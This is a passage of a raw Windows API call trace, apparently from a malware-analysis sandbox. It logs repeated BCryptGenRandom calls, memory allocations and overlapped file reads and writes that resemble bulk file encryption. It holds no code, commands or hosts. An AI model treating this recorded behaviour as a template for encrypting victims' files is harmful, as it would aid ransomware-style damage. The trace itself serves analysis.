GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0102.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0102.626] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.626] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.627] free (_Block=0x77d800) [0102.627] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.627] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.627] free (_Block=0x2071818) [0102.627] free (_Block=0x2071928) [0102.627] free (_Block=0x77d908) [0102.627] WriteFile (in: hFile=0x13c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0102.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0102.638] CloseHandle (hObject=0x13c8) returned 1 [0102.661] free (_Block=0x3e30078) [0102.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0102.677] ReadFile (in: hFile=0xf04, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2418, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0102.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0102.749] WriteFile (in: hFile=0xf00, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.376] WriteFile (in: hFile=0x13c8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.385] WriteFile (in: hFile=0x13b4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.390] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.391] CloseHandle (hObject=0xf00) returned 1 [0103.396] free (_Block=0x3ef0008) [0103.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.432] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.440] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xd14, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0103.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0103.454] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.455] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.455] free (_Block=0x77d800) [0103.455] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.455] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.455] free (_Block=0x2071818) [0103.455] free (_Block=0x2071928) [0103.455] free (_Block=0x77d908) [0103.455] WriteFile (in: hFile=0x710, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.468] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0103.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0103.469] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.469] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.469] free (_Block=0x77d800) [0103.469] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.469] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.469] free (_Block=0x2071818) [0103.469] free (_Block=0x2071928) [0103.469] free (_Block=0x77d908) [0103.469] WriteFile (in: hFile=0x304, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.479] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0103.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0103.481] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.481] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.494] free (_Block=0x77d800) [0103.494] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.494] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.494] free (_Block=0x2071818) [0103.494] free (_Block=0x2071928) [0103.494] free (_Block=0x77d908) [0103.494] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.506] CloseHandle (hObject=0x710) returned 1 [0103.512] free (_Block=0x3e70008) [0103.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.521] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1384, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.554] WriteFile (in: hFile=0x814, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.578] WriteFile (in: hFile=0x304, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.588] ReadFile (in: hFile=0x814, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6906, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.590] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.591] CloseHandle (hObject=0x814) returned 1 [0103.596] free (_Block=0x1ff1e60) [0103.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.617] ReadFile (in: hFile=0x81c, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x7114, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.625] CloseHandle (hObject=0x81c) returned 1 [0103.632] free (_Block=0x3db00b8) [0103.636] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.636] CloseHandle (hObject=0x304) returned 1 [0103.645] free (_Block=0x3e70008) [0103.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0103.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0103.672] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.673] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.673] free (_Block=0x77d800) [0103.673] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0103.673] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0103.673] free (_Block=0x1fa4848) [0103.673] free (_Block=0x2071818) [0103.673] free (_Block=0x77d908) [0103.673] WriteFile (in: hFile=0x304, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.690] WriteFile (in: hFile=0x304, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.699] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.700] CloseHandle (hObject=0x81c) returned 1 [0103.701] free (_Block=0x3e70008) [0103.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0103.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0103.710] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.710] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.710] free (_Block=0x77d800) [0103.710] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0103.710] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0103.710] free (_Block=0x1fa4848) [0103.710] free (_Block=0x2071818) [0103.710] free (_Block=0x77d908) [0103.710] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.720] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.723] CloseHandle (hObject=0x81c) returned 1 [0103.723] free (_Block=0x1ff1e60) [0103.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0103.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0103.731] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.731] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.731] free (_Block=0x77d800) [0103.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0103.731] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0103.731] free (_Block=0x1fa4848) [0103.731] free (_Block=0x2071818) [0103.731] free (_Block=0x77d908) [0103.731] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0103.732] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.270] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4124, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.427] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x687c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.600] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x133c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.609] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.650] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xfe2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.650] CloseHandle (hObject=0x81c) returned 1 [0105.668] free (_Block=0x1ff1e60) [0105.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0105.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0105.699] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0105.699] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0105.699] free (_Block=0x77d800) [0105.699] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0105.699] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 